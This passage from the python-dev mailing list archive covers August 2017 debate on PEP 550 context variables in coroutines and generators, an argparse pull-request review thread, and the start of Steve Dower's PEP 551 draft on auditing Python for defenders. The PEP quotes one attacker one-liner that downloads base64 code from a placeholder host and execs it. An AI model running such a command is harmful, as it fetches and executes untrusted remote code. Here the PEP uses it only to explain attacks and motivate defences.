decimal contexts, numpy.errstate, and warnings.catch_warnings. * Request-related data, such as security tokens and request data in web applications, language context for gettext etc. * Profiling, tracing, and logging in large code bases. Two of them require context propagation *down* the stack of coroutines. What latest PEP 550 revision does, it prohibits context propagation *up* the stack in coroutines (it's a requirement to make async code refactorable and easy to reason about). Propagation of context "up" the stack in regular code is allowed with threading.local(), and everybody is used to it. Doing that for coroutines doesn't work, because of the reasons covered here: https://www.python.org/dev/peps/pep-0550/#coroutines-and-asynchronous-tasks Yury From yselivanov.ml at gmail.com Mon Aug 28 12:16:36 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 12:16:36 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <59A4363F.8040003@stoneleaf.us> Message-ID: On Mon, Aug 28, 2017 at 11:53 AM, Ivan Levkivskyi wrote: > A question appeared here about a simple mental model for PEP 550. > It looks much clearer now, than in the first version, but I still would like > to clarify: can one say that PEP 550 just provides more fine-grained version > of threading.local(), that works not only per thread, but even per coroutine > within the same thread? Simple model: 1. Values in the EC propagate down the call stack for both synchronous and asynchronous code. 2. For regular functions/code EC works the same way as threading.local(). Yury From barry at python.org Mon Aug 28 12:26:54 2017 From: barry at python.org (Barry Warsaw) Date: Mon, 28 Aug 2017 12:26:54 -0400 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: References: Message-ID: <1D692D69-B942-48D8-81FD-3240F43E432D@python.org> On Aug 28, 2017, at 11:50, Yury Selivanov wrote: > For checking if a context variable has a value in the topmost LC, we > can add two new keyword arguments to the "ContextVar.lookup()" method: > > ContextVar.lookup(*, default=None, topmost=False) > > If `topmost` is set to `True`, `lookup` will only check the topmost LC. > > For deleting a value from the topmost LC we can add a new > "ContextVar.delete()" method. +1 -Barry -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 833 bytes Desc: Message signed with OpenPGP URL: From ethan at stoneleaf.us Mon Aug 28 12:43:35 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Mon, 28 Aug 2017 09:43:35 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> Message-ID: <59A44837.2010308@stoneleaf.us> On 08/28/2017 09:12 AM, Yury Selivanov wrote: > If we forget about dynamic scoping (I don't know why it's being brought up all the > time, TBH; nobody uses it, almost no language implements it) Probably because it's not lexical scoping, and possibly because it's possible for a function to be running with one EC on one call, and a different EC on the next -- hence, the EC it's using is dynamically determined. It seems to me the biggest difference between "true" dynamic scoping and what PEP 550 implements is the granularity: i.e. not every single function gets it's own LC, just a select few: generators, async stuff, etc. Am I right? (No CS degree here.) If not, what are the differences? -- ~Ethan~ From tjreedy at udel.edu Mon Aug 28 12:46:05 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Mon, 28 Aug 2017 12:46:05 -0400 Subject: [Python-Dev] [bpo-30421]: Pull request review In-Reply-To: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com> References: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com> Message-ID: On 8/28/2017 3:42 AM, Robert Schindler wrote: > Hello, > > In May, I submitted a pull request that extends the functionality of > argparse.ArgumentParser. The argparse maintainer, bethard (Peter Bethard), was not added to the nosy list. And he does not seem to have been active lately -- his bpo profile does not list a github name. > To do so, I followed the steps described in the developers guide. > > According to [1], I already pinged at GitHub but got no response. The > next step seems to be writing to this list. > > I know that nobody is payed for reviewing submissions, but maybe it just > got overlooked? > > You can find the pull request at [2]. > [1] https://docs.python.org/devguide/pullrequest.html#reviewing > [2] https://github.com/python/cpython/pull/1698 Some core developer has to decide if the new feature should be added, and if so, what the API should be. If Peter is not doing that, I don't know who will. It is possible that the current design is intentional, rather than an oversight. It does not make too much sense to review the implementation (the PR) until the design decisions are made. In this case, the PR adds a feature not discussed on the bpo issue. -- Terry Jan Reedy From yselivanov.ml at gmail.com Mon Aug 28 13:04:15 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 13:04:15 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A44837.2010308@stoneleaf.us> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <59A44837.2010308@stoneleaf.us> Message-ID: On Mon, Aug 28, 2017 at 12:43 PM, Ethan Furman wrote: > On 08/28/2017 09:12 AM, Yury Selivanov wrote: > >> If we forget about dynamic scoping (I don't know why it's being brought up >> all the >> time, TBH; nobody uses it, almost no language implements it) > > > Probably because it's not lexical scoping, and possibly because it's > possible for a function to be running with one EC on one call, and a > different EC on the next -- hence, the EC it's using is dynamically > determined. > > It seems to me the biggest difference between "true" dynamic scoping and > what PEP 550 implements is the granularity: i.e. not every single function > gets it's own LC, just a select few: generators, async stuff, etc. > > Am I right? (No CS degree here.) If not, what are the differences? Sounds right to me. If PEP 550 was about adding true dynamic scoping, we couldn't use it as a suitable context management solution for libraries like decimal. For example, converting decimal/numpy to use new APIs would be a totally backwards-incompatible change. I still prefer using a "better TLS" analogy for PEP 550. We'll likely add a section summarizing differences between threading.local() and new APIs (as suggested by Eric Snow). Yury From stefan at bytereef.org Mon Aug 28 13:33:27 2017 From: stefan at bytereef.org (Stefan Krah) Date: Mon, 28 Aug 2017 19:33:27 +0200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> Message-ID: <20170828173327.GA2671@bytereef.org> On Mon, Aug 28, 2017 at 12:12:00PM -0400, Yury Selivanov wrote: > On Mon, Aug 28, 2017 at 11:52 AM, Stefan Krah wrote: > [..] > > But the state "leaks in" as per your previous example: > > > > async def bar(): > > # use decimal with context=ctx > > > > async def foo(): > > decimal.setcontext(ctx) > > await bar() > > > > > > IMHO it shouldn't with coroutine-local-storage (let's call it CLS). So, > > as I see it, there's still some mixture between dynamic scoping and CLS > > because it this example bar() is allowed to search the stack. > > The whole proposal will then be mostly useless. If we forget about > the dynamic scoping (I don't know why it's being brought up all the > time, TBH; nobody uses it, almost no language implements it) Because a) it was brought up by proponents of the PEP early on python-ideas, b) people desperately want a mental model of what is going on. :-) > * Context managers like decimal contexts, numpy.errstate, and > warnings.catch_warnings. The decimal context works like this: 1) There is a default context template (user settable). 2) Whenever the first operation *in a new thread* occurs, the thread-local context is initialized with a copy of the template. I don't find it very intuitive if setcontext() is somewhat local in coroutines but they don't participate in some form of CLS. You have to think about things like "what happens in a fresh thread when a coroutine calls setcontext() before any other decimal operation has taken place". So perhaps Nathaniel is right that the PEP is not so useful for numpy and decimal backwards compat. Stefan Krah From yselivanov.ml at gmail.com Mon Aug 28 14:00:37 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 14:00:37 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <20170828173327.GA2671@bytereef.org> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> Message-ID: On Mon, Aug 28, 2017 at 1:33 PM, Stefan Krah wrote: [..] >> * Context managers like decimal contexts, numpy.errstate, and >> warnings.catch_warnings. > > The decimal context works like this: > > 1) There is a default context template (user settable). > > 2) Whenever the first operation *in a new thread* occurs, the > thread-local context is initialized with a copy of the > template. > > > I don't find it very intuitive if setcontext() is somewhat local in > coroutines but they don't participate in some form of CLS. > > You have to think about things like "what happens in a fresh thread > when a coroutine calls setcontext() before any other decimal operation > has taken place". I'm sorry, I don't follow you here. PEP 550 semantics: setcontext() in a regular code would set the context for the whole thread. setcontext() in a coroutine/generator/async generator would set the context for all the code it calls. > So perhaps Nathaniel is right that the PEP is not so useful for numpy > and decimal backwards compat. Nathaniel's argument is pretty weak as I see it. He argues that some people would take the following code: def bar(): # set decimal context def foo(): bar() # use the decimal context set in bar() and blindly convert it to async/await: async def bar(): # set decimal context async def foo(): await bar() # use the decimal context set in bar() And that it's a problem that it will stop working. But almost nobody converts the code by simply slapping async/await on top of it -- things don't work this way. It was never a goal for async/await or asyncio, or even trio/curio. Porting code to async/await almost always requires a thoughtful rewrite. In async/await, the above code is an *anti-pattern*. It's super fragile and can break by adding a timeout around "await bar". There's no workaround here. Asynchronous code is fundamentally non-local and a more complex topic on its own, with its own concepts: Asynchronous Tasks, timeouts, cancellation, etc. Fundamentally: "(synchronous code) != (asynchronous code) - (async/await)". Yury From guido at python.org Mon Aug 28 14:26:54 2017 From: guido at python.org (Guido van Rossum) Date: Mon, 28 Aug 2017 11:26:54 -0700 Subject: [Python-Dev] Pep 550 and None/masking In-Reply-To: <1D692D69-B942-48D8-81FD-3240F43E432D@python.org> References: <1D692D69-B942-48D8-81FD-3240F43E432D@python.org> Message-ID: On Mon, Aug 28, 2017 at 9:26 AM, Barry Warsaw wrote: > On Aug 28, 2017, at 11:50, Yury Selivanov wrote: > > > For checking if a context variable has a value in the topmost LC, we > > can add two new keyword arguments to the "ContextVar.lookup()" method: > > > > ContextVar.lookup(*, default=None, topmost=False) > > > > If `topmost` is set to `True`, `lookup` will only check the topmost LC. > > > > For deleting a value from the topmost LC we can add a new > > "ContextVar.delete()" method. > > +1 > Yes, that's the only way. (Also forgive me for ever having proposed lookup() -- I think we should go back to get(), set(), delete(). Things will then be similar to getattr/setattr/delattr for class attributes. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From breamoreboy at yahoo.co.uk Mon Aug 28 16:43:11 2017 From: breamoreboy at yahoo.co.uk (Mark Lawrence) Date: Mon, 28 Aug 2017 21:43:11 +0100 Subject: [Python-Dev] [bpo-30421]: Pull request review In-Reply-To: References: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com> Message-ID: On 28/08/2017 17:46, Terry Reedy wrote: > On 8/28/2017 3:42 AM, Robert Schindler wrote: >> Hello, >> >> In May, I submitted a pull request that extends the functionality of >> argparse.ArgumentParser. > > The argparse maintainer, bethard (Peter Bethard), was not added to the > nosy list.? And he does not seem to have been active lately -- his bpo > profile does not list a github name. > >> To do so, I followed the steps described in the developers guide. >> >> According to [1], I already pinged at GitHub but got no response. The >> next step seems to be writing to this list. >> >> I know that nobody is payed for reviewing submissions, but maybe it just >> got overlooked? >> >> You can find the pull request at [2]. > >> [1] https://docs.python.org/devguide/pullrequest.html#reviewing >> [2] https://github.com/python/cpython/pull/1698 > > Some core developer has to decide if the new feature should be added, > and if so, what the API should be.? If Peter is not doing that, I don't > know who will.? It is possible that the current design is intentional, > rather than an oversight.? It does not make too much sense to review the > implementation (the PR) until the design decisions are made.? In this > case, the PR adds a feature not discussed on the bpo issue. > The bulk of the work on argparse in recent years has been done by paul.j3. I have no idea whether or not he is classed as a core developer. -- My fellow Pythonistas, ask not what our language can do for you, ask what you can do for our language. Mark Lawrence --- This email has been checked for viruses by AVG. http://www.avg.com From yselivanov.ml at gmail.com Mon Aug 28 17:24:29 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 17:24:29 -0400 Subject: [Python-Dev] PEP 550 v4: coroutine policy Message-ID: Long story short, I think we need to rollback our last decision to prohibit context propagation up the call stack in coroutines. In PEP 550 v3 and earlier, the following snippet would work just fine: var = new_context_var() async def bar(): var.set(42) async def foo(): await bar() assert var.get() == 42 # with previous PEP 550 semantics run_until_complete(foo()) But it would break if a user wrapped "await bar()" with "wait_for()": var = new_context_var() async def bar(): var.set(42) async def foo(): await wait_for(bar(), 1) assert var.get() == 42 # AssertionError !!! run_until_complete(foo()) Therefore, in the current (v4) version of the PEP, we made all coroutines to have their own LC (just like generators), which makes both examples always raise an AssertionError. This makes it easier for async/await users to refactor their code: they simply cannot propagate EC changes up the call stack, hence any coroutine can be safely wrapped into a task. Nathaniel and Stefan Krah argued on the mailing list that this change in semantics makes the PEP harder to understand. Essentially, context changes propagate up the call stack for regular code, but not for asynchronous. For regular code the PEP behaves like TLS, but for asynchronous it behaves like dynamic scoping. IMO, on its own, this argument is not strong enough to rollback to the older PEP 550 semantics, but I think I've discovered a stronger one: asynchronous context managers. With the current version (v4) of the PEP, it's not possible to set context variables in __aenter__ and in @contextlib.asynccontextmanager: class Foo: async def __aenter__(self): context_var.set('aaa') # won't be visible outside of __aenter__ So I guess we have no other choice other than reverting this spec change for coroutines. The very first example in this email should start working again. This means that PEP 550 will have a caveat for async code: don't rely on context propagation up the call stack, unless you are writing __aenter__ and __aexit__ that are guaranteed to be called without being wrapped into a Task. BTW, on the topic of dynamic scoping. Context manager protocols (both sync and async) is the fundamental reason why we couldn't implement dynamic scoping in Python even if we wanted to. With a classical dynamic scoping in a functional language, __enter__ would have its own scope, which the code in the 'with' block would never be able to access. Thus I propose to stop associating PEP 550 concepts with (dynamic) scoping. Thanks, Yury From ericsnowcurrently at gmail.com Mon Aug 28 18:14:40 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Mon, 28 Aug 2017 16:14:40 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Sat, Aug 26, 2017 at 3:09 PM, Nathaniel Smith wrote: > You might be interested in these notes I wrote to motivate why we need > a chain of namespaces, and why simple "async task locals" aren't > sufficient: > > https://github.com/njsmith/pep-550-notes/blob/master/dynamic-scope.ipynb Thanks, Nathaniel! That helped me understand the rationale, though I'm still unconvinced chained lookup is necessary for the stated goal of the PEP. (The rest of my reply is not specific to Nathaniel.) tl;dr Please: * make the chained lookup aspect of the proposal more explicit (and distinct) in the beginning sections of the PEP (or drop chained lookup). * explain why normal frames do not get to take advantage of chained lookup (or allow them to). -------------------- If I understood right, the problem is that we always want context vars resolved relative to the current frame and then to the caller's frame (and on up the call stack). For generators, "caller" means the frame that resumed the generator. Since we don't know what frame will resume the generator beforehand, we can't simply copy the current LC when a generator is created and bind it to the generator's frame. However, I'm still not convinced that's the semantics we need. The key statement is "and then to the caller's frame (and on up the call stack)", i.e. chained lookup. On the linked page Nathaniel explained the position (quite clearly, thank you) using sys.exc_info() as an example of async-local state. I posit that that example isn't particularly representative of what we actually need. Isn't the point of the PEP to provide an async-safe alternative to threading.local()? Any existing code using threading.local() would not expect any kind of chained lookup since threads don't have any. So introducing chained lookup in the PEP is unnecessary and consequently not ideal since it introduces significant complexity. As the PEP is currently written, chained lookup is a key part of the proposal, though it does not explicitly express this. I suppose this is where my confusion has been. At this point I think I understand one rationale for the chained lookup functionality; it takes advantage of the cooperative scheduling characteristics of generators, et al. Unlike with threads, a programmer can know the context under which a generator will be resumed. Thus it may be useful to the programmer to allow (or expect) the resumed generator to fall back to the calling context. However, given the extra complexity involved, is there enough evidence that such capability is sufficiently useful? Could chained lookup be addressed separately (in another PEP)? Also, wouldn't it be equally useful to support chained lookup for function calls? Programmers have the same level of knowledge about the context stack with function calls as with generators. I would expect evidence in favor of chained lookups for generators to also favor the same for normal function calls. -eric From ericsnowcurrently at gmail.com Mon Aug 28 18:19:14 2017 From: ericsnowcurrently at gmail.com (Eric Snow) Date: Mon, 28 Aug 2017 16:19:14 -0600 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de> Message-ID: On Sat, Aug 26, 2017 at 10:31 AM, Yury Selivanov wrote: > On Sat, Aug 26, 2017 at 9:33 AM, Sven R. Kunze wrote: > [..] >> Why not the same interface as thread-local storage? This has been the >> question which bothered me from the beginning of PEP550. I don't understand >> what inventing a new way of access buys us here. > > This was covered at length in these threads: > > https://mail.python.org/pipermail/python-ideas/2017-August/046888.html > https://mail.python.org/pipermail/python-ideas/2017-August/046889.html FWIW, it would still be nice to have a simple replacement for the following under PEP 550: class Context(threading.local): ... Transitioning from there to PEP 550 is non-trivial. -eric From greg.ewing at canterbury.ac.nz Mon Aug 28 18:22:57 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Tue, 29 Aug 2017 10:22:57 +1200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> Message-ID: <59A497C1.1050005@canterbury.ac.nz> Yury Selivanov wrote: > On Mon, Aug 28, 2017 at 1:33 PM, Stefan Krah wrote: > [..] > >>>* Context managers like decimal contexts, numpy.errstate, and >>>warnings.catch_warnings. >> >>The decimal context works like this: >> >> 1) There is a default context template (user settable). >> >> 2) Whenever the first operation *in a new thread* occurs, the >> thread-local context is initialized with a copy of the >> template. >> >> >>I don't find it very intuitive if setcontext() is somewhat local in >>coroutines but they don't participate in some form of CLS. >> >>You have to think about things like "what happens in a fresh thread >>when a coroutine calls setcontext() before any other decimal operation >>has taken place". > > > I'm sorry, I don't follow you here. > > PEP 550 semantics: > > setcontext() in a regular code would set the context for the whole thread. > > setcontext() in a coroutine/generator/async generator would set the > context for all the code it calls. > > >>So perhaps Nathaniel is right that the PEP is not so useful for numpy >>and decimal backwards compat. > > > Nathaniel's argument is pretty weak as I see it. He argues that some > people would take the following code: > > def bar(): > # set decimal context > > def foo(): > bar() > # use the decimal context set in bar() > > and blindly convert it to async/await: > > async def bar(): > # set decimal context > > async def foo(): > await bar() > # use the decimal context set in bar() > > And that it's a problem that it will stop working. > > But almost nobody converts the code by simply slapping async/await on > top of it Maybe not, but it will also affect refactoring of code that is *already* using async/await, e.g. taking async def foobar(): # set decimal context # use the decimal context we just set and refactoring it as above. Given that one of the main motivations for yield-from (and subsequently async/await) was so that you *can* perform that kind of refactoring easily, that does indeed seem like a problem to me. It seems to me that individual generators/coroutines shouldn't automatically get a context of their own, they should have to explicitly ask for one. -- Greg -- things don't work this way. It was never a goal for > async/await or asyncio, or even trio/curio. Porting code to > async/await almost always requires a thoughtful rewrite. > > In async/await, the above code is an *anti-pattern*. It's super > fragile and can break by adding a timeout around "await bar". There's > no workaround here. > > Asynchronous code is fundamentally non-local and a more complex topic > on its own, with its own concepts: Asynchronous Tasks, timeouts, > cancellation, etc. Fundamentally: "(synchronous code) != > (asynchronous code) - (async/await)". > > Yury > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/greg.ewing%40canterbury.ac.nz From yselivanov.ml at gmail.com Mon Aug 28 18:37:45 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 18:37:45 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A497C1.1050005@canterbury.ac.nz> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> Message-ID: On Mon, Aug 28, 2017 at 6:22 PM, Greg Ewing wrote: [..] >> But almost nobody converts the code by simply slapping async/await on >> top of it > > > Maybe not, but it will also affect refactoring of code > that is *already* using async/await, e.g. taking > > > async def foobar(): > # set decimal context > # use the decimal context we just set > > and refactoring it as above. There's no code that already uses async/await and decimal context managers/setters. Any such code is broken right now, because decimal context set in one coroutine affects them all. Your example would work only if foobar() is the only coroutine in your program. > > Given that one of the main motivations for yield-from > (and subsequently async/await) was so that you *can* > perform that kind of refactoring easily, that does > indeed seem like a problem to me. With the current PEP 550 semantics w.r.t. generators you still can refactor them. The following code would work as expected: def nested_gen(): # use some_context def gen(): with some_context(): yield from nested_gen() list(gen()) I saying that the following should not work: def nested_gen(): set_some_context() yield def gen(): # some_context is not set yield from nested_gen() # use some_context ??? list(gen()) IOW, any context set in generators should not leak to the caller, ever. This is the whole point of the PEP. As for async/await, see this: https://mail.python.org/pipermail/python-dev/2017-August/149022.html Yury From yselivanov.ml at gmail.com Mon Aug 28 18:40:05 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 18:40:05 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <4f2915bf-d52e-1403-8ab6-602a0decd67c@mail.de> Message-ID: On Mon, Aug 28, 2017 at 6:19 PM, Eric Snow wrote: > On Sat, Aug 26, 2017 at 10:31 AM, Yury Selivanov > wrote: >> On Sat, Aug 26, 2017 at 9:33 AM, Sven R. Kunze wrote: >> [..] >>> Why not the same interface as thread-local storage? This has been the >>> question which bothered me from the beginning of PEP550. I don't understand >>> what inventing a new way of access buys us here. >> >> This was covered at length in these threads: >> >> https://mail.python.org/pipermail/python-ideas/2017-August/046888.html >> https://mail.python.org/pipermail/python-ideas/2017-August/046889.html > > FWIW, it would still be nice to have a simple replacement for the > following under PEP 550: > > class Context(threading.local): > ... > > Transitioning from there to PEP 550 is non-trivial. And it should not be trivial, as the PEP 550 semantics is different from TLS. Using PEP 550 instead of TLS should be carefully evaluated. Please also see this: https://www.python.org/dev/peps/pep-0550/#replication-of-threading-local-interface Yury From tjreedy at udel.edu Mon Aug 28 18:47:20 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Mon, 28 Aug 2017 18:47:20 -0400 Subject: [Python-Dev] [bpo-30421]: Pull request review In-Reply-To: References: <20170828074255.ln2hyhpmds5fkrjk@efficiosoft.com> Message-ID: On 8/28/2017 4:43 PM, Mark Lawrence via Python-Dev wrote: > The bulk of the work on argparse in recent years has been done by > paul.j3.? I have no idea whether or not he is classed as a core developer. 'He' is a CLA-signed contributor, but not a committer, with no GitHub name registered with bpo. -- Terry Jan Reedy From greg.ewing at canterbury.ac.nz Mon Aug 28 18:56:00 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Tue, 29 Aug 2017 10:56:00 +1200 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> Message-ID: <59A49F80.8070808@canterbury.ac.nz> Yury Selivanov wrote: > I saying that the following should not work: > > def nested_gen(): > set_some_context() > yield > > def gen(): > # some_context is not set > yield from nested_gen() > # use some_context ??? And I'm saying it *should* work, otherwise it breaks one of the fundamental principles on which yield-from is based, namely that 'yield from foo()' should behave as far as possible as a generator equivalent of a plain function call. -- Greg From yselivanov.ml at gmail.com Mon Aug 28 19:16:33 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 19:16:33 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: <59A49F80.8070808@canterbury.ac.nz> References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> Message-ID: On Mon, Aug 28, 2017 at 6:56 PM, Greg Ewing wrote: > Yury Selivanov wrote: >> >> I saying that the following should not work: >> >> def nested_gen(): >> set_some_context() >> yield >> >> def gen(): >> # some_context is not set >> yield from nested_gen() >> # use some_context ??? > > > And I'm saying it *should* work, otherwise it breaks > one of the fundamental principles on which yield-from > is based, namely that 'yield from foo()' should behave > as far as possible as a generator equivalent of a > plain function call. > Consider the following generator: def gen(): with decimal.context(...): yield We don't want gen's context to leak to the outer scope -- that's one of the reasons why PEP 550 exists. Even if we do this: g = gen() next(g) # the decimal.context won't leak out of gen So a Python user would have a mental model: context set in generators doesn't leak. Not, let's consider a "broken" generator: def gen(): decimal.context(...) yield If we iterate gen() with next(), it still won't leak its context. But if "yield from" has semantics that you want -- "yield from" to be just like function call -- then calling yield from gen() will corrupt the context of the caller. I simply want consistency. It's easier for everybody to say that generators never leaked their context changes to the outer scope, rather than saying that "generators can sometimes leak their context". Yury From steve.dower at python.org Mon Aug 28 19:55:19 2017 From: steve.dower at python.org (Steve Dower) Date: Mon, 28 Aug 2017 16:55:19 -0700 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime Message-ID: Hi python-dev, Those of you who were at the PyCon US language summit this year (or who saw the coverage at https://lwn.net/Articles/723823/) may recall that I talked briefly about the ways Python is used by attackers to gain and/or retain access to systems on local networks. I present here PEP 551, which proposes the core changes needed to CPython to allow sysadmins (or those responsible for defending their networks) to gain visibility into the behaviour of Python processes on their systems. It has already gone before security-sig, and has had a few significant enhancements as a result. There was also quite a positive reaction on Twitter after the first posting (I now have a significant number of infosec people watching what I do very carefully... :) ) Since the PEP should be self-describing, I'll leave context to its text. I believe it is ready for discussion, though there are three incomplete sections. Firstly, the list of audit locations is not yet complete, but is sufficient for the purposes of discussion (I expect to spend time at the upcoming dev sprints arguing about these in ridiculous detail). Second, the performance analysis has not yet been completed with sufficient robustness to make a concrete statement about its impact. Preliminary tests show negligible impact in the normal case, and the "opted-in" case is the user's responsibility. This also relies somewhat on the list of hooks being complete and the implementation having stabilised. Third, the section on recommendations is not settled. It is hard to recommend approaches in what is very much an evolving field, so I am constantly revising parts of this to keep it all restricted to those things enabled by or affected by this PEP. I am *not* trying to present a full guide on how to prevent attackers breaching your system :) My current implementation is available at: https://github.com/zooba/cpython/tree/sectrans The github rendered version of this file is at: https://github.com/python/peps/blob/master/pep-0551.rst (The one on python.org will update at some point, but is a little behind the version in the repo.) Cheers, Steve ----------------------------------------------------------------------------- PEP: 551 Title: Security transparency in the Python runtime Version: $Revision$ Last-Modified: $Date$ Author: Steve Dower Discussions-To: Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 23-Aug-2017 Python-Version: 3.7 Post-History: 24-Aug-2017 (security-sig) Abstract ======== This PEP describes additions to the Python API and specific behaviors for the CPython implementation that make actions taken by the Python runtime visible to security and auditing tools. The goals in order of increasing importance are to prevent malicious use of Python, to detect and report on malicious use, and most importantly to detect attempts to bypass detection. Most of the responsibility for implementation is required from users, who must customize and build Python for their own environment. We propose two small sets of public APIs to enable users to reliably build their copy of Python without having to modify the core runtime, protecting future maintainability. We also discuss recommendations for users to help them develop and configure their copy of Python. Background ========== Software vulnerabilities are generally seen as bugs that enable remote or elevated code execution. However, in our modern connected world, the more dangerous vulnerabilities are those that enable advanced persistent threats (APTs). APTs are achieved when an attacker is able to penetrate a network, establish their software on one or more machines, and over time extract data or intelligence. Some APTs may make themselves known by maliciously damaging?data (e.g., `WannaCrypt `_) or hardware (e.g., `Stuxnet `_). Most attempt to hide their existence and avoid detection. APTs often use a combination of traditional vulnerabilities, social engineering, phishing (or spear-phishing), thorough network analysis, and an understanding of misconfigured environments to establish themselves and do their work. The first infected machines may not be the final target?and may not require special privileges. For example, an APT that is established as a non-administrative user on a developer?s machine may have the ability to spread to production machines through normal deployment channels. It is common for APTs to persist on as many machines as possible, with sheer weight of presence making them?difficult to remove completely. Whether an attacker?is seeking to cause direct harm or hide their tracks, the biggest barrier to detection is a lack of insight. System administrators with large networks rely on distributed logs to understand what their machines are doing, but logs are often filtered to show only error conditions. APTs that are attempting to avoid detection will rarely generate errors or abnormal events. Reviewing normal operation logs involves a significant amount of effort, though work is underway by a number of companies to enable automatic anomaly detection within operational logs.?The tools preferred by attackers are ones that are already installed on the target machines, since log messages from these tools are often expected and ignored in normal use. At this point, we are not going to spend further time discussing the existence of APTs or methods and mitigations that do not apply to this PEP. For further information about the field, we recommend reading or watching the resources listed under `Further Reading`_. Python is a particularly interesting tool for attackers due to its prevalence on server and developer machines, its ability to execute arbitrary code provided as data (as opposed to native binaries), and its complete lack of internal auditing. This allows attackers to download, decrypt, and execute malicious code with a single command:: python -c "import urllib.request, base64; exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())" This command currently bypasses most anti-malware scanners?that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or?access another machine on the local network from which to obtain its payload). General consensus among the security community is that totally preventing attacks is infeasible and defenders should assume that they will often detect attacks only after they have succeeded. This is known as the "assume breach" mindset. [1]_ In this scenario, protections such as sandboxing?and input validation have already failed, and the important task is detection, tracking, and eventual removal of the malicious code. To this end, the primary feature required from Python is security transparency: the ability to see what operations the Python runtime is performing that may indicate anomalous or malicious use. Preventing such use is valuable, but secondary to the need to know that it is occurring. To summarise the goals in order of increasing importance: * preventing malicious use is valuable * detecting malicious use is important * detecting attempts to bypass detection is critical One example of a scripting engine that has addressed these challenges is PowerShell, which has recently been enhanced towards similar goals of transparency and prevention. [2]_ Generally, application and system configuration will determine which events within a scripting engine are worth logging.?However, given the value of many logs events are not recognized until after an attack is detected, it is important to capture as much as possible and filter views rather than filtering at the source (see the No Easy Breach video from `Further Reading`_). Events that are always of interest include attempts to bypass auditing, attempts to load and execute code that is not correctly signed or access-controlled, use of uncommon operating system functionality such as debugging or inter-process inspection tools, most network access and DNS resolution, and attempts to create and hide files or configuration settings on the local machine. To summarize, defenders have a need to audit specific uses of Python in order to detect abnormal or malicious usage. Currently, the Python runtime does not provide any ability to do this, which (anecdotally) has led to organizations switching to other languages. The aim of this PEP is to enable system administrators to deploy a security transparent copy of Python that can integrate with their existing auditing and protection systems. On Windows, some specific features that may be enabled by this include: * Script Block Logging [3]_ * DeviceGuard [4]_ * AMSI [5]_ * Persistent Zone Identifiers [6]_ * Event tracing (which includes event forwarding) [7]_ On Linux, some specific features that may be integrated are: * gnupg [8]_ * sd_journal [9]_ * OpenBSM [10]_ * syslog [11]_ * auditd [12]_ * SELinux labels [13]_ * check execute bit on imported modules On macOS, some features that may be used with the expanded APIs are: * OpenBSM [10]_ * syslog [11]_ Overall, the ability to enable these platform-specific features on production machines is highly appealing to system administrators and will make Python a more trustworthy dependency for application developers. Overview of Changes =================== True security transparency is not fully achievable by Python in isolation. The runtime can audit as many events as it likes, 